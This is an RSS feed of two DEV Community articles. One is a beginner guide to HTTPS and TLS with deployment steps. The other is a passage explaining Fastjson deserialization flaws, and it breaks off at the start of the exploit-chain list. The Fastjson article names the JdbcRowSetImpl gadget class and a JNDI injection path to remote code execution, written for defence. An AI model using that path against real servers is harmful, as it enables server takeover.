<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Tiger Smith</title>
    <description>The latest articles on DEV Community by Tiger Smith (@tiger_smith_9f421b9131db5).</description>
    <link>https://dev.to/tiger_smith_9f421b9131db5</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3517679%2Fe6742343-0cf7-4475-b9e2-bfd20ad21b59.png</url>
      <title>DEV Community: Tiger Smith</title>
      <link>https://dev.to/tiger_smith_9f421b9131db5</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/tiger_smith_9f421b9131db5"/>
    <language>en</language>
    <item>
      <title>HTTP vs HTTPS vs SSL/TLS: A Comprehensive Guide to Web Security Protocols (with HTTPS Deployment Steps)</title>
      <dc:creator>Tiger Smith</dc:creator>
      <pubDate>Mon, 08 Dec 2025 21:48:51 +0000</pubDate>
      <link>https://dev.to/tiger_smith_9f421b9131db5/http-vs-https-vs-ssltls-a-comprehensive-guide-to-web-security-protocols-with-https-deployment-1l42</link>
      <guid>https://dev.to/tiger_smith_9f421b9131db5/http-vs-https-vs-ssltls-a-comprehensive-guide-to-web-security-protocols-with-https-deployment-1l42</guid>
      <description>&lt;p&gt;Have you ever noticed the difference between “http://” and “https://” when typing a URL? What does the small lock icon next to the address bar signify when you make a payment on an e-commerce platform or log into a social media account? In internet communications, terms like HTTP, HTTPS, and SSL/TLS appear frequently—they are not only core technologies safeguarding network security but also “barometers” for ordinary users to perceive online safety.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Source of the article: &lt;a href="https://devresourcehub.com/http-vs-https-vs-ssl-tls-a-comprehensive-guide-to-web-security-protocols-with-https-deployment-steps.html" rel="noopener noreferrer"&gt;HTTP vs HTTPS vs SSL/TLS: A Comprehensive Guide to Web Security Protocols (with HTTPS Deployment Steps)&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;This guide will break down the relationships and functions of these technologies from the perspectives of protocol essence, working mechanisms, and security logic. It also includes practical HTTPS deployment steps, helping developers, website owners, and tech enthusiasts decode the “security passwords” behind web communications.&lt;/p&gt;

&lt;h2&gt;
  
  
  I. HTTP: The “Bare” Foundation of Internet Data Transmission
&lt;/h2&gt;

&lt;p&gt;HTTP (Hypertext Transfer Protocol), proposed by Tim Berners-Lee in 1990, is a core protocol in the application layer of the TCP/IP model. It lays the groundwork for web resource transmission as a stateless request-response protocol, defining interaction standards between clients (e.g., browsers) and servers—similar to a standardized “data communication template.” However, security mechanisms were not integrated into its initial design, leaving data transmission in a “plaintext exposed” state.&lt;/p&gt;

&lt;h3&gt;
  
  
  1.1 The “Request-Response” Workflow of HTTP (Taking Access to &lt;a href="https://www.example.com/" rel="noopener noreferrer"&gt;tools.devresourcehub.com&lt;/a&gt; as an Example)
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt; &lt;strong&gt;Request Message Construction&lt;/strong&gt;: After entering a URL, the browser encapsulates an HTTP request message, consisting of a request line (e.g., “GET /index.html HTTP/1.1”), request headers (e.g., “User-Agent: Mozilla/5.0”, “Cookie: sessionid=xxx”), and an optional request body (carrying form data for POST requests).&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;TCP Connection Establishment&lt;/strong&gt;: HTTP relies on the reliable transmission service provided by TCP. The client establishes a connection with the server’s port 80 through a three-way handshake (“SYN→SYN-ACK→ACK”) to ensure the order and integrity of data transmission.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Server Response Processing&lt;/strong&gt;: Upon receiving the request, the server executes corresponding business logic (e.g., database queries, static resource reading) and generates a response message. This includes a status line (e.g., “HTTP/1.1 200 OK”), response headers (e.g., “Content-Type: text/html; charset=utf-8”, “Content-Length: 1024”), and a response body (resources like HTML, CSS, and JS).&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Connection Release and Rendering&lt;/strong&gt;: The browser parses the response body and completes DOM rendering. If the Keep-Alive persistent connection mechanism of HTTP/1.1 is not enabled, TCP releases the connection through a four-way handshake (“FIN→ACK→FIN→ACK”), requiring a new connection for each subsequent request.&lt;/li&gt;
&lt;/ol&gt;
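&lt;p&gt;The request and response messages from steps 1 and 3 can be written out by hand to make their structure concrete. A small Python sketch using the example values above (the cookie value is a placeholder):&lt;/p&gt;

```python
# The plaintext message the browser assembles in step 1.
request = (
    "GET /index.html HTTP/1.1\r\n"      # request line
    "Host: www.example.com\r\n"         # request headers
    "User-Agent: Mozilla/5.0\r\n"
    "Cookie: sessionid=xxx\r\n"
    "\r\n"                              # blank line ends the headers
)

# The status line and headers the server returns in step 3.
response = (
    "HTTP/1.1 200 OK\r\n"               # status line
    "Content-Type: text/html; charset=utf-8\r\n"
    "Content-Length: 1024\r\n"
    "\r\n"                              # the response body would follow here
)

print(request.split("\r\n")[0])   # GET /index.html HTTP/1.1
print(response.split("\r\n")[0])  # HTTP/1.1 200 OK
```

&lt;p&gt;Every byte of both messages travels over the TCP connection exactly as shown, which is what the next section's security discussion builds on.&lt;/p&gt;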

&lt;h3&gt;
  
  
  1.2 Three Fatal Flaws of HTTP (Still Plaguing Some Websites Today)
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Plaintext Transmission Risk&lt;/strong&gt;: All communication data is transmitted in ASCII plaintext. Attackers can intercept data packets through ARP spoofing, router sniffing, or other methods to directly extract sensitive information. For example, unencrypted HTTP login requests can be captured by Wireshark on public WiFi, leading to the leakage of account passwords.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Lack of Identity Authentication&lt;/strong&gt;: The HTTP protocol has no mechanism to verify server identity. Attackers can launch man-in-the-middle attacks by hijacking DNS or setting up fake servers. In a phishing incident, attackers forged a bank’s HTTP website, resulting in the leakage of bank card information from thousands of users.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Compromised Data Integrity&lt;/strong&gt;: Without a data verification mechanism, attackers can tamper with HTTP messages in transit. For instance, in e-commerce scenarios, an attacker could modify the “Price” field in the response message from $1999 to $99, causing economic losses to the merchant.&lt;/li&gt;
&lt;/ul&gt;
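&lt;p&gt;A quick sketch of the first flaw: everything in the capture below is readable without any key. The host and credentials are invented for illustration:&lt;/p&gt;

```python
# What an eavesdropper on public WiFi sees when a login form is submitted
# over plain HTTP (illustrative bytes, modeled on a sniffed packet payload).
captured = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: bank.example\r\n"
    b"Content-Type: application/json\r\n"
    b"\r\n"
    b'{"user": "alice", "password": "hunter2"}'
)

# No decryption step is needed: the password sits in the capture as-is.
print(b"hunter2" in captured)   # True
```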

&lt;p&gt;⚠️ &lt;strong&gt;Key Note&lt;/strong&gt;: Major browsers like Chrome and Firefox now forcibly mark HTTP websites as “Not Secure,” and Google Search significantly demotes their rankings—using HTTP for website building no longer holds practical value in modern web environments.&lt;/p&gt;

&lt;h2&gt;
  
  
  II. SSL/TLS: The “Security Shield” of HTTPS, Current Mainstream Algorithms
&lt;/h2&gt;

&lt;p&gt;To address HTTP’s security vulnerabilities, Netscape launched the SSL (Secure Sockets Layer) protocol in 1994. After iterations through SSL 2.0 and 3.0, the IETF standardized it as the TLS (Transport Layer Security) protocol in 1999. Currently, TLS 1.2 remains the most widely compatible base version, while TLS 1.3 has become the optimal choice for performance and security due to an optimized handshake (cut from two round trips to one) and upgraded cipher suites (removing weak algorithms like 3DES and RC4). TLS 1.0 and 1.1 have been fully deprecated by major browsers and server vendors due to security vulnerabilities such as BEAST and POODLE.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.1 Core Technology: The “Golden Combination” of Symmetric and Asymmetric Encryption
&lt;/h3&gt;

&lt;p&gt;SSL/TLS’s essence lies in combining the advantages of two encryption algorithms to balance “security” and “efficiency”:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Encryption Type&lt;/th&gt;
&lt;th&gt;Key Features&lt;/th&gt;
&lt;th&gt;Use Cases&lt;/th&gt;
&lt;th&gt;Limitations&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Symmetric Encryption (e.g., AES-256-GCM)&lt;/td&gt;
&lt;td&gt;Single key for encryption/decryption; fast operation (100-1000x faster than asymmetric encryption)&lt;/td&gt;
&lt;td&gt;Encrypting large volumes of actual data (web content, files)&lt;/td&gt;
&lt;td&gt;Risk of key interception during distribution&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Asymmetric Encryption (e.g., ECC/RSA)&lt;/td&gt;
&lt;td&gt;Public key (publicly accessible) for encryption; private key (confidential) for decryption; high security&lt;/td&gt;
&lt;td&gt;Securely exchanging symmetric keys; verifying server identity&lt;/td&gt;
&lt;td&gt;Slow operation; unsuitable for large-scale data encryption&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Collaboration Logic&lt;/strong&gt;: SSL/TLS adopts a hybrid architecture of “asymmetric encryption for key exchange + symmetric encryption for data transmission.” During the handshake phase, asymmetric encryption (e.g., ECC) is used to securely distribute the “pre-master secret,” preventing key interception in transit. After the handshake, both parties generate a session key (symmetric key) based on the pre-master secret and random numbers. All subsequent application-layer data is encrypted using symmetric algorithms like AES-256-GCM, balancing security and transmission efficiency.&lt;/p&gt;
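&lt;p&gt;The “asymmetric key exchange, then symmetric bulk encryption” split can be sketched with a toy finite-field Diffie-Hellman exchange using only the standard library. The tiny modulus and generator are made up for illustration and are nowhere near secure:&lt;/p&gt;

```python
import secrets
import hashlib

# Toy Diffie-Hellman (real TLS uses 2048-bit-plus groups or elliptic curves).
p = 0xFFFFFFFB   # a small 32-bit prime modulus (demo only)
g = 5            # generator (demo value)

a = secrets.randbelow(p - 2) + 2   # client's ephemeral private key
b = secrets.randbelow(p - 2) + 2   # server's ephemeral private key
A = pow(g, a, p)   # client's public value, sent in the clear
B = pow(g, b, p)   # server's public value, sent in the clear

# Both ends compute the same secret without it ever crossing the wire:
# pow(B, a, p) and pow(A, b, p) are both g^(a*b) mod p.
client_secret = pow(B, a, p)
server_secret = pow(A, b, p)

# The shared secret then seeds the symmetric session key for bulk data.
session_key = hashlib.sha256(str(client_secret).encode()).digest()
print(client_secret == server_secret, len(session_key))   # True 32
```

&lt;p&gt;After this point all application data is protected with the fast symmetric key, which is exactly the hybrid architecture described above.&lt;/p&gt;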

&lt;h3&gt;
  
  
  2.2 TLS 1.3 Handshake Process (Optimized to a Single Round Trip)
&lt;/h3&gt;

&lt;p&gt;The handshake is the core of SSL/TLS for establishing a secure connection. TLS 1.3 simplifies steps compared to TLS 1.2, significantly improving access speed:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt; &lt;strong&gt;Client Hello&lt;/strong&gt;: The client sends a message to the server containing a list of supported TLS versions (e.g., TLS 1.3/TLS 1.2), supported cipher suites (e.g., TLS_AES_256_GCM_SHA384, TLS_CHACHA20_POLY1305_SHA256), a 32-byte client random number, and extension fields (e.g., ALPN protocol negotiation).&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Server Hello + Certificate + Key Exchange&lt;/strong&gt;: After selecting the optimal configuration, the server returns a Server Hello message (confirming the TLS version and cipher suite), a digital certificate (issued by a trusted CA, containing the server’s public key, domain name, validity period, etc.), and key exchange parameters (e.g., ECDHE ephemeral public key). The client verifies the validity of the certificate chain using built-in CA root certificates; if verification fails, a browser security warning is triggered.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Key Derivation and Verification&lt;/strong&gt;: Both sides combine the exchanged ECDHE ephemeral keys to compute a shared secret (TLS 1.3 drops the older RSA key exchange, so the pre-master secret is never encrypted with the server’s public key). Each side then feeds this shared secret, together with the client and server random numbers and a hash of the handshake transcript, into HKDF (the HMAC-based Key Derivation Function) to derive the session keys that encrypt application data and protect its integrity.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Handshake Finished&lt;/strong&gt;: Both parties encrypt a “Finished” message using the session key, which contains a hash of all messages during the handshake. If the receiver decrypts the message and the hash values match, the handshake is confirmed successful, and the secure channel is officially established.&lt;/li&gt;
&lt;/ol&gt;
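&lt;p&gt;The derivation in step 3 can be sketched by implementing RFC 5869’s HKDF with the standard library’s hmac and hashlib. This is a simplified illustration: the labels and transcript value below are made up, and real TLS 1.3 uses the more elaborate HKDF-Expand-Label construction on top of this primitive:&lt;/p&gt;

```python
import hmac
import hashlib

def hkdf_extract(salt, ikm):
    # Extract: condense the (EC)DHE shared secret into a pseudorandom key.
    return hmac.new(salt, ikm, hashlib.sha256).digest()

def hkdf_expand(prk, info, length):
    # Expand: stretch the PRK into `length` bytes, bound to `info` (which in
    # TLS 1.3 carries a label plus a hash of the handshake transcript).
    okm, block = b"", b""
    rounds = -(-length // 32)          # ceil(length / SHA-256 output size)
    for counter in range(1, rounds + 1):
        block = hmac.new(prk, block + info + bytes([counter]),
                         hashlib.sha256).digest()
        okm += block
    return okm[:length]

shared_secret = b"\x0b" * 32           # stand-in for the ECDHE result
transcript = hashlib.sha256(b"ClientHello...ServerHello").digest()

prk = hkdf_extract(b"\x00" * 32, shared_secret)
session_key = hkdf_expand(prk, b"key" + transcript, 32)
iv = hkdf_expand(prk, b"iv" + transcript, 12)
print(len(session_key), len(iv))       # 32 12
```

&lt;p&gt;Binding the transcript hash into the derivation is what lets the “Finished” check in step 4 detect any tampering with earlier handshake messages.&lt;/p&gt;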

&lt;h3&gt;
  
  
  2.3 Essential Differences Between SSL/TLS Handshake and TCP Three-Way Handshake
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Comparison Dimension&lt;/th&gt;
&lt;th&gt;SSL/TLS Handshake&lt;/th&gt;
&lt;th&gt;TCP Three-Way Handshake&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Core Purpose&lt;/td&gt;
&lt;td&gt;Establish an encrypted channel, verify identity, exchange keys&lt;/td&gt;
&lt;td&gt;Establish a reliable transmission channel, confirm send/receive capabilities&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Working Layer&lt;/td&gt;
&lt;td&gt;Between transport layer and application layer&lt;/td&gt;
&lt;td&gt;Transport layer&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Security&lt;/td&gt;
&lt;td&gt;Provides eavesdropping prevention, tampering prevention, and forgery prevention&lt;/td&gt;
&lt;td&gt;No security mechanisms; only ensures reliable data transmission&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Implementation Mechanism&lt;/td&gt;
&lt;td&gt;Relies on asymmetric encryption (e.g., RSA), symmetric encryption (e.g., AES), and digital certificates&lt;/td&gt;
&lt;td&gt;Based on interactions of three control messages: “SYN”, “SYN-ACK”, “ACK”&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Number of Interactions&lt;/td&gt;
&lt;td&gt;1 round trip for TLS 1.3; 2 round trips for TLS 1.2&lt;/td&gt;
&lt;td&gt;Fixed 3 interactions&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Application Scenarios&lt;/td&gt;
&lt;td&gt;Secure communication scenarios like HTTPS, FTPS, SMTPS&lt;/td&gt;
&lt;td&gt;All TCP-based communication scenarios like HTTP, FTP, Telnet&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;In simple terms: The TCP three-way handshake “builds a road,” while the SSL/TLS handshake “installs door locks and monitoring on the road.”&lt;/p&gt;

&lt;h2&gt;
  
  
  III. HTTPS: The Secure Upgrade of HTTP, From Principles to Deployment
&lt;/h2&gt;

&lt;p&gt;HTTPS (HTTP Secure) is a security-enhanced version of the HTTP protocol. By inserting an SSL/TLS encryption layer between HTTP and TCP, it achieves confidentiality, integrity, and identity authentication of application-layer data. It uses port 443 by default and follows an architecture of “encrypted tunnel + plaintext protocol”—SSL/TLS handles underlying encrypted data transmission, while HTTP manages upper-layer application logic interactions. Together, they form the security standard for modern web communications.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.1 Why HTTPS Is Indispensable Today: Four Core Values
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Privacy Protection&lt;/strong&gt;: Sensitive user data such as login credentials and payment information is transmitted encrypted. Even if intercepted, the data cannot be decrypted.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Trust Endorsement&lt;/strong&gt;: Verifies website identity through digital certificates issued by trusted CAs (Certificate Authorities), eliminating phishing sites.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;SEO Advantage&lt;/strong&gt;: Google lists HTTPS as a ranking signal, so with otherwise comparable content, HTTPS websites tend to receive noticeably more search traffic than HTTP sites.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Compliance Requirements&lt;/strong&gt;: Regulations such as the EU’s GDPR and China’s Personal Information Protection Law mandate HTTPS for processing sensitive data. Violations can result in fines of up to 4% of global annual turnover.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  3.2 Full HTTPS Communication Process (From URL Entry to Webpage Rendering)
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt; The browser initiates a TCP three-way handshake to the server’s port 443 to establish a basic connection.&lt;/li&gt;
&lt;li&gt; Both parties perform a TLS 1.3 handshake to negotiate encryption rules and generate a session key.&lt;/li&gt;
&lt;li&gt; The browser sends an encrypted HTTP request (e.g., GET /index.html).&lt;/li&gt;
&lt;li&gt; The server decrypts the request with the session key, processes it, and returns an encrypted HTTP response.&lt;/li&gt;
&lt;li&gt; The browser decrypts the response, parses it, and renders the webpage.&lt;/li&gt;
&lt;li&gt; After data transmission is complete, SSL/TLS closes the secure connection, and TCP releases the connection through a four-way handshake.&lt;/li&gt;
&lt;/ol&gt;
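&lt;p&gt;On the client side, steps 1 and 2 correspond to the defaults of Python’s ssl module. A small standard-library sketch (no request is actually sent here, so nothing touches the network):&lt;/p&gt;

```python
import ssl
import http.client

# The default client context ships with trusted CA roots and enforces both
# certificate validation and hostname checking (step 2's verification).
ctx = ssl.create_default_context()
print(ctx.check_hostname)                     # True
print(ctx.verify_mode == ssl.CERT_REQUIRED)   # True

# HTTPS defaults to port 443; the TLS handshake runs right after TCP connect.
conn = http.client.HTTPSConnection("www.example.com", context=ctx)
print(conn.port)                              # 443
# conn.request("GET", "/index.html") would then travel through the encrypted
# channel, and conn.getresponse() would decrypt the reply with the session key.
```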

&lt;h3&gt;
  
  
  3.3 Practical HTTPS Deployment Guide (Beginner-Friendly)
&lt;/h3&gt;

&lt;p&gt;💡 &lt;strong&gt;Recommended Tools&lt;/strong&gt;: Let’s Encrypt (free certificates), Certbot (automated deployment), Nginx/Apache (server configuration)&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt; &lt;strong&gt;Certificate Application and Verification&lt;/strong&gt;: Use an ACME protocol client (e.g., Certbot) to connect to Let’s Encrypt and verify domain ownership through DNS-01 or HTTP-01 challenges. For DNS verification, add a TXT record to domain resolution; for HTTP verification, place a specific verification file on the server. Once verified, you can obtain PEM-format files containing the certificate chain (server certificate, intermediate certificate) with a 90-day validity period. Configure a crontab task for automatic renewal (e.g., “0 0,12 * * * certbot renew --quiet”, which checks twice a day and renews any certificate approaching expiry).&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Server Configuration Optimization&lt;/strong&gt;: For Nginx, in addition to basic SSL configuration, add security enhancements: &lt;code&gt;ssl_protocols TLSv1.2 TLSv1.3; ssl_prefer_server_ciphers on; ssl_ciphers "EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH"; ssl_session_cache shared:SSL:10m; ssl_session_timeout 10m;&lt;/code&gt;. Here, &lt;code&gt;ssl_protocols&lt;/code&gt; explicitly disables older TLS versions, and &lt;code&gt;ssl_ciphers&lt;/code&gt; prioritizes forward-secrecy algorithms.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;HSTS and Redirect Configuration&lt;/strong&gt;: Set up a 301 permanent redirect from HTTP to HTTPS: &lt;code&gt;server { listen 80; server_name example.com; return 301 https://$host$request_uri; }&lt;/code&gt;, and add the HSTS response header inside the HTTPS server block: &lt;code&gt;add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;&lt;/code&gt;. HSTS forces browsers to use HTTPS directly for subsequent visits, preventing SSL stripping attacks.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Post-Deployment Testing and Tuning&lt;/strong&gt;: Use the SSL Labs Test tool for a security score, aiming for an A+ rating. Common optimization points include enabling OCSP Stapling to reduce certificate verification time, configuring HTTP/2 to improve concurrency performance, and disabling SSL session tickets to avoid key reuse risks.&lt;/li&gt;
&lt;/ol&gt;
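&lt;p&gt;The protocol-and-cipher policy from step 2 can also be expressed with Python’s ssl module. This is a sketch of the policy itself, not a replacement for the Nginx configuration:&lt;/p&gt;

```python
import ssl

# Server-side context mirroring "ssl_protocols TLSv1.2 TLSv1.3" and a
# forward-secret AEAD cipher preference (demo of the policy, not a server).
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.minimum_version = ssl.TLSVersion.TLSv1_2   # refuse TLS 1.0/1.1 clients
ctx.set_ciphers("ECDHE+AESGCM")                # ECDHE key exchange, AES-GCM

# Inspect which suites the context would actually offer.
names = [c["name"] for c in ctx.get_ciphers()]
print(names[0])
```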

&lt;h2&gt;
  
  
  IV. Common Misconceptions: Pitfalls to Avoid with HTTPS
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Q1: Does HTTPS Use Asymmetric Encryption for All Data Transmission?
&lt;/h3&gt;

&lt;p&gt;No. Asymmetric encryption is only used to exchange keys during the handshake phase. Actual data transmission relies on symmetric encryption—using asymmetric encryption for all data would slow webpage loading by orders of magnitude due to its low speed.&lt;/p&gt;
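&lt;p&gt;The speed gap can be made concrete with a rough timing sketch: a 2048-bit modular exponentiation (the core of an RSA private-key operation) against a single pass of a fast symmetric-style primitive. SHA-256 stands in for AES here because the standard library ships no block cipher; the numbers are illustrative, not a rigorous benchmark:&lt;/p&gt;

```python
import timeit
import hashlib
import secrets

msg = secrets.token_bytes(190)
modulus = secrets.randbits(2048) | 1   # stand-in RSA-sized modulus (demo only)
d = secrets.randbits(2048) | 1         # stand-in 2048-bit private exponent
m = int.from_bytes(msg, "big")

# One RSA-sized "decrypt": modular exponentiation with a 2048-bit exponent.
asym = timeit.timeit(lambda: pow(m, d, modulus), number=20)
# One pass of a fast symmetric-style primitive over the same bytes.
sym = timeit.timeit(lambda: hashlib.sha256(msg).digest(), number=20)
print(asym / sym)   # the gap is typically several orders of magnitude
```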

&lt;h3&gt;
  
  
  Q2: Is HTTPS 100% Secure?
&lt;/h3&gt;

&lt;p&gt;No. HTTPS security depends on end-to-end secure configuration, with three key risk points requiring careful prevention:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Certificate Trust Chain Issues&lt;/strong&gt;: Self-signed certificates or incorrectly configured intermediate certificates will cause browsers to distrust the site. A company once experienced a 4-hour HTTPS service outage in 2024 due to an expired intermediate certificate.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Vulnerable Cipher Suites&lt;/strong&gt;: Websites using TLS 1.0 or RC4 algorithms are prone to cracking. An e-commerce platform in 2024 suffered a data breach affecting 100,000 users due to enabling weak cipher suites.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Configuration Defects&lt;/strong&gt;: Not enabling HSTS may expose the site to SSL stripping attacks, while an incomplete certificate chain increases verification time. Regular security scans (e.g., using OpenVAS) and configuration audits are necessary to ensure the HTTPS environment complies with OWASP security standards.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Q3: Are Free Certificates Less Secure Than Paid Ones?
&lt;/h3&gt;

&lt;p&gt;No difference in encryption strength. Free certificates from Let’s Encrypt offer the same encryption as paid certificates from commercial CAs. The main differences are that paid certificates can provide organization or extended validation (OV/EV certificates) and technical support—free certificates are sufficient for personal blogs or small-to-medium enterprises.&lt;/p&gt;

&lt;h2&gt;
  
  
  V. Conclusion: The Evolution and Future of Web Security Protocols
&lt;/h2&gt;

&lt;p&gt;The evolution from HTTP to HTTPS reflects the transformation of internet security architecture from “function-first” to a “zero-trust” model. As quantum computing technology advances, post-quantum cryptography (PQC) has begun to integrate with the TLS protocol. NIST-standardized algorithms like CRYSTALS-Kyber (now ML-KEM) are gradually becoming standard for key encapsulation to defend against future quantum computing attacks on RSA/ECC algorithms.&lt;/p&gt;

&lt;p&gt;For enterprises and developers, HTTPS is not only a compliance requirement but also a core infrastructure for building user trust and ensuring business continuity. A regular security operation and maintenance mechanism should be established, including certificate lifecycle management, encryption algorithm upgrades, and security vulnerability response, to maintain communication security amid technological iterations.&lt;/p&gt;

&lt;p&gt;The next time you see the small lock icon in your browser’s address bar, remember: it represents a security barrier jointly constructed by TCP/IP’s reliable transmission, SSL/TLS’s encryption protection, and HTTP’s application interaction. Whether building a website or browsing the web, security is always the top priority of the internet.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Deep Dive into Fastjson Deserialization Vulnerabilities: From Principles to Practical Defense</title>
      <dc:creator>Tiger Smith</dc:creator>
      <pubDate>Tue, 25 Nov 2025 14:22:20 +0000</pubDate>
      <link>https://dev.to/tiger_smith_9f421b9131db5/deep-dive-into-fastjson-deserialization-vulnerabilities-from-principles-to-practical-defense-2ka6</link>
      <guid>https://dev.to/tiger_smith_9f421b9131db5/deep-dive-into-fastjson-deserialization-vulnerabilities-from-principles-to-practical-defense-2ka6</guid>
      <description>&lt;p&gt;As one of the most widely used JSON parsing libraries in the Java ecosystem, Fastjson is favored for its high performance. However, its deserialization vulnerabilities—especially CVE-2022-25845—have repeatedly led to large-scale security incidents. Attackers only need to construct malicious JSON strings to achieve Remote Code Execution (RCE) and take full control of servers. This article breaks down the vulnerability’s root cause, dissects bypass techniques across versions with hands-on examples, and finally presents enterprise-grade defense strategies to help you eliminate risks completely.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Source of the article: &lt;a href="https://devresourcehub.com/deep-dive-into-fastjson-deserialization-vulnerabilities-from-principles-to-practical-defense.html" rel="noopener noreferrer"&gt;Deep Dive into Fastjson Deserialization Vulnerabilities: From Principles to Practical Defense&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  I. Core Principle of Fastjson Vulnerabilities: AutoType Mechanism Is the Root Cause
&lt;/h2&gt;

&lt;p&gt;The deserialization vulnerability in Fastjson essentially stems from &lt;strong&gt;security flaws in the AutoType mechanism&lt;/strong&gt;. Originally designed to simplify the restoration of complex object types, this mechanism was exploited by attackers to load malicious classes and trigger dangerous operations.&lt;/p&gt;

&lt;h3&gt;
  
  
  1.1 How the AutoType Mechanism Works
&lt;/h3&gt;

&lt;p&gt;When Fastjson parses JSON containing the &lt;code&gt;@type&lt;/code&gt; field, it follows these steps:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt; &lt;strong&gt;Extract Class Name&lt;/strong&gt;: Read the fully qualified name of the target class (e.g., &lt;code&gt;com.sun.rowset.JdbcRowSetImpl&lt;/code&gt;) from the &lt;code&gt;@type&lt;/code&gt; field.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Class Loading&lt;/strong&gt;: Load the specified class via &lt;code&gt;ClassLoader&lt;/code&gt;, prioritizing cached or configured classes.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Object Instantiation&lt;/strong&gt;: Create an instance of the class using its default constructor or inject properties via setter methods.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Trigger Dangerous Logic&lt;/strong&gt;: If the class contains risky methods (such as JNDI lookup or reflective code execution—e.g., &lt;code&gt;setDataSourceName&lt;/code&gt; in &lt;code&gt;JdbcRowSetImpl&lt;/code&gt;), these methods are automatically invoked during property injection, ultimately leading to RCE.&lt;/li&gt;
&lt;/ol&gt;
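&lt;p&gt;The four steps map onto a compact Python analogue. This is illustrative only, not Fastjson’s code: the &lt;code&gt;unsafe_load&lt;/code&gt; helper and the Counter example are made up for this sketch, but they show why letting input data pick the class and drive setters is dangerous:&lt;/p&gt;

```python
import importlib

# A Python analogue of AutoType-style deserialization: the "@type" field
# chooses the class, and every remaining field is written onto the fresh
# instance, which is exactly where dangerous setters would fire.
def unsafe_load(data):
    module_name, _, cls_name = data.pop("@type").rpartition(".")  # step 1
    cls = getattr(importlib.import_module(module_name), cls_name) # step 2
    obj = cls()                                                   # step 3
    for key, value in data.items():                               # step 4
        setattr(obj, key, value)  # a setter like setDataSourceName would
    return obj                    # run attacker-chosen logic right here

# Harmless demo: the input string decides that a collections.Counter is built.
obj = unsafe_load({"@type": "collections.Counter", "note": "demo"})
print(type(obj).__name__, obj.note)   # Counter demo
```

&lt;p&gt;A safe loader would check the class name against a strict allowlist before step 2, which is precisely the hardening Fastjson later bolted onto AutoType.&lt;/p&gt;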

&lt;h3&gt;
  
  
  1.2 Key Exploit Chain for Vulnerabilities
&lt;/h3&gt;

&lt;p&gt;Attackers leverage the combination of &lt;strong&gt;automatic setter invocation&lt;/strong&gt; and &lt;strong&gt;JNDI injection&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
